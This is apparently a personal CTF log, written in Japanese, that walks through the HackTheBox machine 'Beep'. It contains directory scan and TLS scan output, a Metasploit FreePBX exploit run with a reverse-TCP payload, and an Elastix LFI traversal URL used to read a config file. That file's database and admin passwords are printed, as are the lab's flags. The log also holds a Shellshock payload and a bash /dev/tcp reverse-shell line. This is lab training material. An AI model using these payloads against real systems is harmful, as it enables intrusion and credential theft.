/program/steps/addressbook/mailto.inc (Status: 200) [Size: 1857]
/program/steps/addressbook/save.inc (Status: 200) [Size: 4310]
/program/steps/addressbook/search.inc (Status: 200) [Size: 1831]
/program/steps/addressbook/show.inc (Status: 200) [Size: 2612]
/program/steps/mail/addcontact.inc (Status: 200) [Size: 2360]
/program/steps/mail/attachments.inc (Status: 200) [Size: 5334]
/program/steps/mail/autocomplete.inc (Status: 200) [Size: 1696]
/program/steps/mail/check_recent.inc (Status: 200) [Size: 3248]
/program/steps/mail/compose.inc (Status: 200) [Size: 33386]
/program/steps/mail/folders.inc (Status: 200) [Size: 2597]
/program/steps/mail/get.inc (Status: 200) [Size: 4743]
/program/steps/mail/getunread.inc (Status: 200) [Size: 1550]
/program/steps/mail/move_del.inc (Status: 200) [Size: 4658]
/program/steps/mail/headers.inc (Status: 200) [Size: 1632]
/program/steps/mail/list.inc (Status: 200) [Size: 3233]
/program/steps/mail/mark.inc (Status: 200) [Size: 4706]
/program/steps/mail/search.inc (Status: 200) [Size: 3887]
/program/steps/mail/func.inc (Status: 200) [Size: 49403]
/program/steps/mail/sendmail.inc (Status: 200) [Size: 20547]
/program/steps/mail/sendmdn.inc (Status: 200) [Size: 1570]
/program/steps/mail/show.inc (Status: 200) [Size: 8718]
/program/steps/mail/viewsource.inc (Status: 200) [Size: 2068]
/program/steps/settings/edit_identity.inc (Status: 200) [Size: 5135]
/program/steps/settings/edit_prefs.inc (Status: 200) [Size: 2451]
/program/steps/settings/func.inc (Status: 200) [Size: 24906]
/program/steps/settings/identities.inc (Status: 200) [Size: 1697]
/program/steps/settings/save_identity.inc (Status: 200) [Size: 3950]
/program/steps/settings/save_prefs.inc (Status: 200) [Size: 10540]
/robots.txt           (Status: 200) [Size: 26]
/SQL/mssql.initial.sql (Status: 200) [Size: 7801]
/SQL/mysql.initial.sql (Status: 200) [Size: 4492]
/SQL/postgres.initial.sql (Status: 200) [Size: 5357]
/SQL/sqlite.initial.sql (Status: 200) [Size: 3625]
/temp/.htaccess       (Status: 403) [Size: 297]
/UPGRADING            (Status: 200) [Size: 4668]
Progress: 2379 / 2380 (99.96%)
===============================================================
Finished
===============================================================

roaris commented 3 months ago

たくさん出てきたけど、何を見たらよいのか分からない exploit-dbでApache 2.2.3とCyrusとOpenSSH 4.3で検索したけど、使えそうなものは出てこず

roaris commented 3 months ago

詰んだので、Guided Mode Q. Which Linux distribution is the target machine running?

A. CentOS(nmapの結果に書いてある)

Q. What version of TLS is the web application on TCP port 443 using? Hint : Running the curl command with one or more verbose flags (-v) can yield headers and other information about the underlying service. If Firefox won't load the page, you can edit security.tls.version.min to 1 in about:config.

A. 1.0

curlの結果見ると、1.3とも書いてあるけどね見方が分からない sslscanの結果はこうなった clientが初め1.3を使おうとしたけど、serverが対応していなくて1.0になったということかな

$ sslscan 10.10.10.7
Version: 2.1.3-static
OpenSSL 3.0.12 24 Oct 2023

Connected to 10.10.10.7

Testing SSL server 10.10.10.7 on port 443 using SNI name 10.10.10.7

  SSL/TLS Protocols:
SSLv2     disabled
SSLv3     enabled
TLSv1.0   enabled
TLSv1.1   disabled
TLSv1.2   disabled
TLSv1.3   disabled

  TLS Fallback SCSV:
Server does not support TLS Fallback SCSV

  TLS renegotiation:
Secure session renegotiation supported

  TLS Compression:
Compression enabled (CRIME)

  Heartbleed:
TLSv1.0 not vulnerable to heartbleed

  Supported Server Cipher(s):
Preferred TLSv1.0  256 bits  DHE-RSA-AES256-SHA            DHE 1024 bits
Accepted  TLSv1.0  128 bits  DHE-RSA-AES128-SHA            DHE 1024 bits
Accepted  TLSv1.0  112 bits  DHE-RSA-DES-CBC3-SHA          DHE 1024 bits
Accepted  TLSv1.0  256 bits  AES256-SHA
Accepted  TLSv1.0  128 bits  AES128-SHA
Accepted  TLSv1.0  112 bits  DES-CBC3-SHA
Accepted  TLSv1.0  128 bits  TLS_RSA_WITH_RC4_128_MD5
Accepted  TLSv1.0  128 bits  TLS_RSA_WITH_RC4_128_SHA
Accepted  TLSv1.0  56 bits   TLS_RSA_WITH_DES_CBC_SHA
Accepted  TLSv1.0  56 bits   TLS_DHE_RSA_WITH_DES_CBC_SHA

  SSL Certificate:
Signature Algorithm: sha1WithRSAEncryption
RSA Key Strength:    1024

Subject:  localhost.localdomain
Issuer:   localhost.localdomain

Not valid before: Apr  7 08:22:08 2017 GMT
Not valid after:  Apr  7 08:22:08 2018 GMT

roaris commented 3 months ago

Q. What is the name of the software that's hosting a webserver on 443?

elastix

Q. Which Elastix endpoint is vulnerable to a Local File Inclusion? Hint : Search for vulnerabilities using resources such as Exploit-DB. There's a lot in Elastix - we'll focus on 37637.

あー、exploit-dbでelastixを検索すれば良かったのか A. /vtigercrm/graph.php https://www.exploit-db.com/exploits/37637

でも、LFIよりもリモートコード実行あるけど、これ試せないのか？ https://www.exploit-db.com/exploits/18650

roaris commented 3 months ago

msf6 > search elastix

Matching Modules
================

   #  Name                                 Disclosure Date  Rank    Check  Description
   -  ----                                 ---------------  ----    -----  -----------
   0  exploit/unix/http/freepbx_callmenum  2012-03-20       manual  No     FreePBX 2.10.0 / 2.9.0 callmenum Remote Code Execution

Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/http/freepbx_callmenum

msf6 > use exploit/unix/http/freepbx_callmenum
[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(unix/http/freepbx_callmenum) > options

Module options (exploit/unix/http/freepbx_callmenum):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   EXTENSION  0-100            yes       A range of Local extension numbers
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/bas
                                         ics/using-metasploit.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                       no        HTTP server virtual host

Payload options (cmd/unix/python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.23.73.202    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

View the full module info with the info, or info -d command.

msf6 exploit(unix/http/freepbx_callmenum) > set RHOSTS 10.10.10.7
RHOSTS => 10.10.10.7
msf6 exploit(unix/http/freepbx_callmenum) > set SSL true
[!] Changing the SSL option's value may require changing RPORT!
SSL => true
msf6 exploit(unix/http/freepbx_callmenum) > set RPORT 443
RPORT => 443
msf6 exploit(unix/http/freepbx_callmenum) > set LHOST 10.10.16.4
LHOST => 10.10.16.4
msf6 exploit(unix/http/freepbx_callmenum) > exploit

[*] Started reverse TCP handler on 10.10.16.4:4444
[*] 10.10.10.7:443 - Sending evil request with range 0
[*] 10.10.10.7:443 - Sending evil request with range 1
[*] 10.10.10.7:443 - Sending evil request with range 2
[*] 10.10.10.7:443 - Sending evil request with range 3
[*] 10.10.10.7:443 - Sending evil request with range 4
[*] 10.10.10.7:443 - Sending evil request with range 5
[*] 10.10.10.7:443 - Sending evil request with range 6
[*] 10.10.10.7:443 - Sending evil request with range 7
[*] 10.10.10.7:443 - Sending evil request with range 8
[*] 10.10.10.7:443 - Sending evil request with range 9
[*] 10.10.10.7:443 - Sending evil request with range 10
[*] 10.10.10.7:443 - Sending evil request with range 11
[*] 10.10.10.7:443 - Sending evil request with range 12
[*] 10.10.10.7:443 - Sending evil request with range 13
[*] 10.10.10.7:443 - Sending evil request with range 14
[*] 10.10.10.7:443 - Sending evil request with range 15
[*] 10.10.10.7:443 - Sending evil request with range 16
[*] 10.10.10.7:443 - Sending evil request with range 17
[*] 10.10.10.7:443 - Sending evil request with range 18
[*] 10.10.10.7:443 - Sending evil request with range 19
[*] 10.10.10.7:443 - Sending evil request with range 20
[*] 10.10.10.7:443 - Sending evil request with range 21
[*] 10.10.10.7:443 - Sending evil request with range 22
[*] 10.10.10.7:443 - Sending evil request with range 23
[*] 10.10.10.7:443 - Sending evil request with range 24
[*] 10.10.10.7:443 - Sending evil request with range 25
[*] 10.10.10.7:443 - Sending evil request with range 26
[*] 10.10.10.7:443 - Sending evil request with range 27
[*] 10.10.10.7:443 - Sending evil request with range 28
[*] 10.10.10.7:443 - Sending evil request with range 29
[*] 10.10.10.7:443 - Sending evil request with range 30
...

駄目そう

roaris commented 3 months ago

Q. What is the name of the FreePBX configuration file that contains the database configuration? Hint : The POC from searchsploit with ID 37637 shows grabbing this file.

amportal.conf

なんでLFIに着目するのか分からないな https://qiita.com/elliot_tk/items/6db38c857f77c7e9b830 Q. LFIはファイルを実行できるのに対して、ディレクトリトラバーサルは閲覧のみ可能ということです。端的に言えば、関数の違いということになります。一般的には、LFIの方が重大な脆弱性であると考えられています。

なるほど

roaris commented 3 months ago

今回のLFIはRCEに繋がる？ https://www.exploit-db.com/exploits/37637 を見る限り、そんな感じしないけど

roaris commented 3 months ago

Q. What additional flag is needed when attempting to SSH as root to the target machine due to a "no matching key exchange method found" error? It starts with -o and ends with -sha1. Hint : Because this system is very old, modern systems consider it suspect to connect to them. Search for the error and there will be forums giving suggestions for how to connect. You can use the LFI vulnerability from the previous question

意味が分からないので、writeupを見る

roaris commented 3 months ago

https://paichan-it.hatenablog.com/entry/2020/05/01/221552

https://www.exploit-db.com/exploits/37637 に書いてある/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action にアクセスするらしい

なんか色々書いてあるけど、見にくいのでページソースを参照するらしい (ここに重要な情報が書いてあるか分からないし、見にくい時点で諦めそう)

AMPDBUSER=asteriskuser
# AMPDBPASS=amp109
AMPDBPASS=jEhdIekWmdjE
AMPENGINE=asterisk
AMPMGRUSER=admin
#AMPMGRPASS=amp111
AMPMGRPASS=jEhdIekWmdjE

って書いてあって、admin / jEhdIekWmdjE でhttps:\//10.10.10.7にログイン出来たけど、サーバに入れてるわけじゃないしなあ(←リバースシェルをアップロードするような場所を探そう)

と思ったら、これでSSHログインを試すらしい

roaris commented 3 months ago

$ ssh asteriskuser@10.10.10.7
Unable to negotiate with 10.10.10.7 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1

https://gametech.vatchlog.com/2023/06/02/ssh-bibou/#toc2 オプションで鍵交換方式を指定すれば良いらしい

$ ssh asteriskuser@10.10.10.7 -oKexAlgorithms=diffie-hellman-group-exchange-sha1
Unable to negotiate with 10.10.10.7 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss

$ ssh asteriskuser@10.10.10.7 -oKexAlgorithms=diffie-hellman-group14-sha1
Unable to negotiate with 10.10.10.7 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss

$ ssh asteriskuser@10.10.10.7 -oKexAlgorithms=diffie-hellman-group1-sha1
Unable to negotiate with 10.10.10.7 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss

$ ssh admin@10.10.10.7 -oKexAlgorithms=diffie-hellman-group-exchange-sha1
Unable to negotiate with 10.10.10.7 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss

$ ssh admin@10.10.10.7 -oKexAlgorithms=diffie-hellman-group14-sha1
Unable to negotiate with 10.10.10.7 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss

$ ssh admin@10.10.10.7 -oKexAlgorithms=diffie-hellman-group1-sha1
Unable to negotiate with 10.10.10.7 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss

駄目ですね

roaris commented 3 months ago

Q. What additional flag is needed when attempting to SSH as root to the target machine due to a "no matching key exchange method found" error? It starts with -o and ends with -sha1. Hint : Because this system is very old, modern systems consider it suspect to connect to them. Search for the error and there will be forums giving suggestions for how to connect. You can use the LFI vulnerability from the previous question

結局この問題の答えが不明 -oKexAlgorithms=diffie-hellman-group-exchange-sha1でも、-oKexAlgorithms=diffie-hellman-group14-sha1でも、-oKexAlgorithms=diffie-hellman-group1-sha1でもない

というか-oKexAlgorithmsで検索しても全然出てこないが

問題の答えは-oKexAlgorithms=+diffie-hellman-group1-sha1らしい https://unix.stackexchange.com/questions/340844/how-to-enable-diffie-hellman-group1-sha1-key-exchange-on-debian-8-0 まあこれでも無理なんですが

$ ssh admin@10.10.10.7 -oKexAlgorithms=+diffie-hellman-group1-sha1
Unable to negotiate with 10.10.10.7 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss

roaris commented 3 months ago

これはこれで別のエラーらしい https://qiita.com/nanbuwks/items/47248b6ed2d37086e40d -oHostKeyAlgorithms=+ssh-rsa もつけてやっと通った

$ ssh admin@10.10.10.7 -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa
The authenticity of host '10.10.10.7 (10.10.10.7)' can't be established.
RSA key fingerprint is SHA256:Ip2MswIVDX1AIEPoLiHsMFfdg1pEJ0XXD5nFEjki/hI.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.7' (RSA) to the list of known hosts.
admin@10.10.10.7's password:
Permission denied, please try again.

roaris commented 3 months ago

結局ユーザ名はasteriskuserでもadminでもなく、rootらしい

$ ssh root@10.10.10.7 -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa
root@10.10.10.7's password:
Last login: Tue Jul 16 11:45:47 2019

Welcome to Elastix
----------------------------------------------------

To access your Elastix System, using a separate workstation (PC/MAC/Linux)
Open the Internet Browser using the following URL:
http://10.10.10.7

[root@beep ~]# ls
anaconda-ks.cfg            install.log         postnochroot  webmin-1.570-1.noarch.rpm
elastix-pr-2.2-1.i386.rpm  install.log.syslog  root.txt
[root@beep ~]# cat root.txt
b61afc9ba02d807b9ede9d7e9c170eac
[root@beep ~]# cd /home
[root@beep home]# ls
fanis  spamfilter
[root@beep home]# cd fanis
[root@beep fanis]# ls
user.txt
[root@beep fanis]# cat user.txt
966c9eecc2a280bcebc24b6a15766b91

roaris commented 3 months ago

解き方まとめ

サーバ側でTLSのバージョン1.0しか対応していなくて、ブラウザでアクセス出来ない Firefoxのabout:configからTLSのバージョン1.0を使えるようにする(Chromeの場合は不明)
elastixっていうアプリケーションが使われているので、searchsploitでelastixと検索
LFIの脆弱性が出てくるので、とりあえずそのコードを見てみる
コード中のURLにアクセスする
HTMLが読みにくいので、ソースを参照する
なんかのユーザ名とパスワードが書いてあるので、SSHログインを試みる
サーバ側のSSHの鍵交換アルゴリズムが古くてエラーになるので、オプションをつけて実行する
結局SSHのユーザ名はroot

エスパー要素多くない？自力で解ける気しないんだが

roaris commented 3 months ago

まだGuided Modeが続いている Q. There are many other ways to root Beep. These questions after the root flag are hints to help identify them. What is the 2012 CVE ID for pre-authentication remote code execution vulnerablity in FreePBX / Elastix? Hint : Searching for "elastix" in searchsploit or ExploitDB will find this. Its exploitdb-id is 18650.

A. CVE-2012-4869

さっき試したけど、上手くいかなかったやつ

Q. What password from the PBX config also works to log in as root to the Webmin application listening on TCP 10000? Hint : Try the different passwords from that file. Once logged in as root, it's possible to create a task and get code execution and a shell.

A. jEhdIekWmdjE

create a task and get code execution and a shell って書いてあるけど、そんな場所ある？

Q. What is the common name for the set of 2014 CVEs where this is a POC exploit: () { :; };sleep 10? Hint : It's also known as bashdoor, but we're looking for the name that starts with 's'. Putting this into the user-agent string of a CGI request will execute a ten second sleep. That same payload can be modified to get a shell.

A. shellshock

今回CGI関係ある？

Q. What is the full path to the asterisk user's mail folder on Beep? Hint : Because there's a PHP LFI vulnerability in Beep, if we can get a webshell onto the box and then include it, we can get execution that way. Try sending asterisk an email with a webshell.

ファイルアップロードできるような場所ある？

roaris commented 3 months ago

コマンド実行出来る場所を発見ローカルでnc -lvp 4444した状態で、sh -i >& /dev/tcp/10.10.16.4/4444 0>&1を実行なんか出来なかった

roaris / ctf-log

HackTheBox: Beep (Machine Easy) #34